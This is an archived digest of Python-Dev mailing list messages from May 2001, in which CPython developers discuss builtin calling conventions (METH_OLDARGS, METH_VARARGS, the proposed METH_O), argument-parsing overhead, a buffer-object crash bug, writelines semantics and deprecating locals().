> ceval to support these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so:

    static PyObject *
    builtin_len(PyObject *self, PyObject *args)
    {
        PyObject *v;
        long res;

        if (!PyArg_ParseTuple(args, "O:len", &v))
            return NULL;

So it's clearly expecting a tuple.
But its entry in the builtin_methods[] table is:

    {"len", builtin_len, 1, len_doc},

That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has

    /* Flag passed to newmethodobject */
    #define METH_OLDARGS  0x0000
    #define METH_VARARGS  0x0001
    #define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is it that builtin_len gets a tuple? Something doesn't add up here.

Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is doing the dirty assumption:

    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it.

From tim.one@home.com Sun May 27 21:46:29 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: 
Message-ID: 

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple. But its entry in the builtin_methods[]
> table is:
>
>     {"len", builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that.

Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out.
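The calling conventions being puzzled over here can be summarized with a Python model of what a C builtin receives. This is a sketch based on the behavior described in the replies: METH_OLDARGS unwraps a single argument and passes several as a tuple, while METH_O insists on exactly one. The "NULL when there are no arguments" case is an assumption about the 2.x dispatch code and should be checked against the source. `call_builtin` is a hypothetical name.

```python
def call_builtin(func, convention, args, name="func"):
    """Model what a C function sees for positional `args` under each flag.
    None stands in for a C NULL pointer."""
    if convention == "METH_VARARGS":
        return func(tuple(args))          # always the full argument tuple
    if convention == "METH_OLDARGS":
        if len(args) == 0:
            return func(None)             # assumed: NULL when called with no args
        if len(args) == 1:
            return func(args[0])          # a lone argument is passed unwrapped
        return func(tuple(args))          # several arguments arrive as a tuple
    if convention == "METH_O":
        if len(args) != 1:
            raise TypeError(f"{name}() takes exactly one argument "
                            f"({len(args)} given)")
        return func(args[0])              # no tuple, no format-string parsing
    raise ValueError(f"unknown convention {convention!r}")


def echo(arg):
    return arg


# Under METH_OLDARGS, f(1, 2) and f((1, 2)) are indistinguishable:
print(call_builtin(echo, "METH_OLDARGS", (1, 2)))     # (1, 2)
print(call_builtin(echo, "METH_OLDARGS", ((1, 2),)))  # (1, 2)
# METH_VARARGS keeps them apart:
print(call_builtin(echo, "METH_VARARGS", ((1, 2),)))  # ((1, 2),)
```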
From mwh@python.net Sun May 27 22:32:48 2001
From: mwh@python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: 
Message-ID: 

On Sun, 27 May 2001, Tim Peters wrote:

> Next question: why isn't builtin_len using METH_OLDARGS instead? Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0? (or was it 1.6?)

My impression is that generally METH_VARARGS is saner than METH_OLDARGS (ie. more consistent).

It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS.

Cheers,
M.

From tim.one@home.com Sun May 27 23:49:38 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: 
Message-ID: 

[Tim]
> Next question: why isn't builtin_len using METH_OLDARGS instead? Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0? (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developments. Among other things, looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument.

> My impression is that generally METH_VARARGS is saner than METH_OLDARGS
> (ie. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving end.

> but get argument count checking over METH_OLDARGS.
Which is worth getting. I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
size-ly y'rs - tim

PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer.

From thomas@xs4all.net Sun May 27 23:50:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: 
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:
> > Next question: why isn't builtin_len using METH_OLDARGS instead? Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do
> >>> len(1,2)
> 2
> a la list.append, socket.connect pre 2.0? (or was it 1.6?)

And don't forget the method-specific error message by passing ':len' in the format string. Of course, this can easily be (and probably should) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call.

--
Thomas Wouters

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!

From thomas@xs4all.net Sun May 27 23:58:30 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: 
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
> size-ly y'rs - tim

And recycle a quote a day ;)

> PS: But today I'll add another: add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please!
The Pine source code is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
-what-Pine-actually-tries-to-do-ly y'rs,
--
Thomas Wouters

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!

From martin@loewis.home.cs.tu-berlin.de Sun May 27 23:45:53 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit. What I reported earlier is that the
> BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple(). This strikes me as excessive, because it's a
> static property of the code. (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
>
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of calling it will be less visible.
What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on).

Regards,
Martin

From tim.one@home.com Mon May 28 00:17:27 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: 

[Thomas Wouters]
> And don't forget the method-specific error message by passing ':len' in
> the format string. Of course, this can easily be (and probably should)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument.

Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way:

    if (!PyArg_ParseTuple(args, "O:abs", &v))
    if (!PyArg_ParseTuple(args, "O:callable", &v))
    if (!PyArg_ParseTuple(args, "O:id", &v))
    if (!PyArg_ParseTuple(args, "O:hash", &v))
    if (!PyArg_ParseTuple(args, "O:hex", &v))
    if (!PyArg_ParseTuple(args, "O:float", &v))
    if (!PyArg_ParseTuple(args, "O:len", &v))
    if (!PyArg_ParseTuple(args, "O:list", &v))
    else if (!PyArg_ParseTuple(args, "O:min/max", &v))
    if (!PyArg_ParseTuple(args, "O:oct", &v))
    if (!PyArg_ParseTuple(args, "O:ord", &obj))
    if (!PyArg_ParseTuple(args, "O:reload", &v))
    if (!PyArg_ParseTuple(args, "O:repr", &v))
    if (!PyArg_ParseTuple(args, "O:str", &v))
    if (!PyArg_ParseTuple(args, "O:tuple", &v))
    if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today:

>>> len(val=2)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case. He should add "()" after the function name. He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible.

From greg@cosc.canterbury.ac.nz Mon May 28 01:23:55 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: 
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz         +--------------------------------------+

From greg@cosc.canterbury.ac.nz Mon May 28 01:28:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein
> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz         +--------------------------------------+

From tim.one@home.com Mon May 28 02:42:30 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: 

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
> needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore.

From tim.one@home.com Mon May 28 02:52:18 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: 

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c: that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point. Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0.

From martin@loewis.home.cs.tu-berlin.de Mon May 28 07:36:49 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS?

METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true?

Regards,
Martin

From martin@loewis.home.cs.tu-berlin.de Mon May 28 08:40:54 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. It has

    if (args == NULL || !PySequence_Check(args)) {
        PyErr_SetString(PyExc_TypeError,
            "writelines() argument must be a sequence of strings");
        return NULL;
    }

Because it is a METH_OLDARGS method, you can do

    f=open("/tmp/x","w")
    f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics?

Regards,
Martin

From thomas@xs4all.net Mon May 28 09:17:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

>     if (args == NULL || !PySequence_Check(args)) {
>         PyErr_SetString(PyExc_TypeError,
>             "writelines() argument must be a sequence of strings");
>         return NULL;
>     }

> Because it is a METH_OLDARGS method, you can do

>     f=open("/tmp/x","w")
>     f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x].
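A transitional shim for the writelines() change would accept the old multi-argument form for one more release while emitting a DeprecationWarning. A sketch of one follows. `writelines_compat` is a hypothetical helper, not part of any Python release. It is shown against io.StringIO, whose writelines() in current Python 3 accepts exactly one argument.

```python
import io
import warnings


def writelines_compat(f, *args):
    """Call f.writelines() with one sequence; treat several positional
    strings as the deprecated old form and warn about it."""
    if len(args) == 1:
        return f.writelines(args[0])
    warnings.warn("writelines() with several arguments is deprecated; "
                  "pass a single sequence of strings",
                  DeprecationWarning, stacklevel=2)
    return f.writelines(args)


buf = io.StringIO()
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    writelines_compat(buf, "foo\n", "bar\n")   # old style: warns, still works
print(repr(buf.getvalue()), caught[0].category.__name__)
# 'foo\nbar\n' DeprecationWarning
```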
Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>>

I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definitely not benefit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1....

--
Thomas Wouters

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!

From mal@lemburg.com Mon May 28 10:04:51 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: 
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
>
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c: that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
>
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
>
> That's not the point. Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others. /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code.
Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library.

Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode.

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
>
> Wait for what? If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0? The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority; same for the above refactoring.

--
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From mal@lemburg.com Mon May 28 10:19:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: 
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
>
> [Thomas Wouters]
> > And don't forget the method-specific error message by passing ':len' in
> > the format string. Of course, this can easily be (and probably should)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
>
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets a (one or more) keyword argument.
>
> Stick to METH_O and it's a clear win, even in this respect: there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
>
>     if (!PyArg_ParseTuple(args, "O:abs", &v))
>     if (!PyArg_ParseTuple(args, "O:callable", &v))
>     if (!PyArg_ParseTuple(args, "O:id", &v))
>     if (!PyArg_ParseTuple(args, "O:hash", &v))
>     if (!PyArg_ParseTuple(args, "O:hex", &v))
>     if (!PyArg_ParseTuple(args, "O:float", &v))
>     if (!PyArg_ParseTuple(args, "O:len", &v))
>     if (!PyArg_ParseTuple(args, "O:list", &v))
>     else if (!PyArg_ParseTuple(args, "O:min/max", &v))
>     if (!PyArg_ParseTuple(args, "O:oct", &v))
>     if (!PyArg_ParseTuple(args, "O:ord", &obj))
>     if (!PyArg_ParseTuple(args, "O:reload", &v))
>     if (!PyArg_ParseTuple(args, "O:repr", &v))
>     if (!PyArg_ParseTuple(args, "O:str", &v))
>     if (!PyArg_ParseTuple(args, "O:tuple", &v))
>     if (!PyArg_ParseTuple(args, "O:type", &v))
>
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs. The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway. Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
>
> >>> len(val=2)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
>
> Martin's would say
>
>     TypeError: len takes no keyword arguments
>
> in this case. He should add "()" after the function name. He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases: make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack.
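MAL's METH_OBJARGS idea hands the callee its PyObject* arguments directly and passes NULL for absent optional ones; the callee then supplies its own default. It can be modeled as below. This is a hypothetical sketch: `call_objargs` and `toy_getattr` are illustrative names. A private sentinel plays the role of NULL, so an explicit None argument stays distinguishable from a missing one, just as Py_None differs from NULL in C.

```python
NULL = object()  # sentinel standing in for a C NULL pointer


def call_objargs(func, args, required, optional=0, name="func"):
    """Check the argument count, then pad missing optional slots with NULL."""
    n = len(args)
    if not required <= n <= required + optional:
        raise TypeError(f"{name}() takes {required} to {required + optional} "
                        f"arguments ({n} given)")
    return func(*args, *([NULL] * (required + optional - n)))


def toy_getattr(obj, attr, default):
    # The callee, not the caller, decides what a missing default means.
    if default is NULL:
        return getattr(obj, attr)
    return getattr(obj, attr, default)


# Roughly what "OO|O:getattr" describes: two required objects, one optional.
print(call_objargs(toy_getattr, (object(), "missing", 42), 2, 1))    # 42
print(call_objargs(toy_getattr, (object(), "missing", None), 2, 1))  # None
```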
In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value).

This would take care of most builtins:

Python/bltinmodule.c:
 -- if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
 -- if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
 -- if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
 -- if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
 -- if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
 -- if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
 -- if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
 -- if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
 -- if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
 -- if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
 -- if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
 -- if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
 -- if (!PyArg_ParseTuple(args, "O:abs", &v))
 -- if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
 -- if (!PyArg_ParseTuple(args, "O:callable", &v))
 -- if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
 -- if (!PyArg_ParseTuple(args, "O:id", &v))
 -- if (!PyArg_ParseTuple(args, "O:hash", &v))
 -- if (!PyArg_ParseTuple(args, "O:hex", &v))
 -- if (!PyArg_ParseTuple(args, "O:float", &v))
 -- if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
 -- if (!PyArg_ParseTuple(args, "O:len", &v))
 -- if (!PyArg_ParseTuple(args, "O:list", &v))
 -- if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
 -- else if (!PyArg_ParseTuple(args, "O:min/max", &v))
 -- if (!PyArg_ParseTuple(args, "O:oct", &v))
 -- if (!PyArg_ParseTuple(args, "O:ord", &obj))
 -- if (!PyArg_ParseTuple(args, "O:reload", &v))
 -- if (!PyArg_ParseTuple(args, "O:repr", &v))
 -- if (!PyArg_ParseTuple(args, "O:str", &v))
 -- if (!PyArg_ParseTuple(args, "O:tuple", &v))
 -- if (!PyArg_ParseTuple(args, "O:type", &v))

--
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From jeremy@digicool.com Mon May 28 17:45:27 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now. I'm +1 on METH_O, then.

Jeremy

From tim.one@home.com Mon May 28 18:23:47 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: 

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code.

From fdrake@acm.org Mon May 28 19:20:01 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: 
References: 
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
> Looking at a bug report Fred forwarded, I realized that after
> py-howto.sourceforge.net was set up, www.python.org/doc/howto was
> never changed to redirect to the SF site instead. As of this
> afternoon, that's now done; links on www.python.org have been updated,
> and I've added the redirect.
> > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgotten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Mon May 28 19:33:13 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the documentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr.
PythonLabs at Digital Creations From tim.one@home.com Tue May 29 00:42:05 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the documentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing

    def f(...):
        ...
